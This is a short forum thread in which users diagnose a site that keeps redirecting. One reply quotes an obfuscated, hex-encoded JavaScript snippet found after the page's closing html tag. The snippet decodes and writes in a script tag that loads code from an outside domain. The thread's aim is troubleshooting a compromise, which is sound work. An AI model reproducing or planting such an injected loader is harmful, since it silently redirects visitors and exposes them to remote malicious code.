Quote:
Originally Posted by ruff
Site is still redirecting. This script is at the bottom of your index page under the </html> tag. Looks sinister to me.
<script>var i,y,x="3c736372697074206c616e67756167653d276a61766 173637269707427207372633d27687474703a2f2f7777772e6 36c617961696d2e636f6d2f696e6465782e7068703f7265663 d7765626578273e3c2f7363726970743e";y='';for(i=0;i< x.length;i+=2){y+=unescape('%'+x.substr(i,2));}doc ument.write(y);</script>
|
Thats the script under html that I was talking about, thought it was deleted.. My bad
Quote:
Originally Posted by Colmike7
Also, is that last line of js after html tag supposed to be there?..
|